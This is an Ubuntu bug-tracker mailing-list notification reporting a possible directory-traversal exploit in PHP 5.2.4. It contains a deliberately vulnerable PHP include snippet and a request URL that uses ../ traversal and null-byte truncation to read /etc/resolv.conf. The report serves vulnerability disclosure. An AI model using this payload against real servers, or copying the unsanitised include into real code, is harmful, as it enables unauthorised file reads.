I reproduced the same effect using webroot /var/www
file test.php:
<?php
if($_GET["pageID"])
$pageID=$_GET["pageID"];
include('page.'.$pageID.'.inc');
?>
http://myserver/test.php?pageID=/../../../etc/resolv.conf%00
filesystem is ext3 on a local harddrive
--
PHP 5.2.4-2ubuntu5.9 Possible exploit using directory traversal
https://bugs.launchpad.net/bugs/491835
You received this bug notification because you are a member of Ubuntu
Bugs, which is a direct subscriber.
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
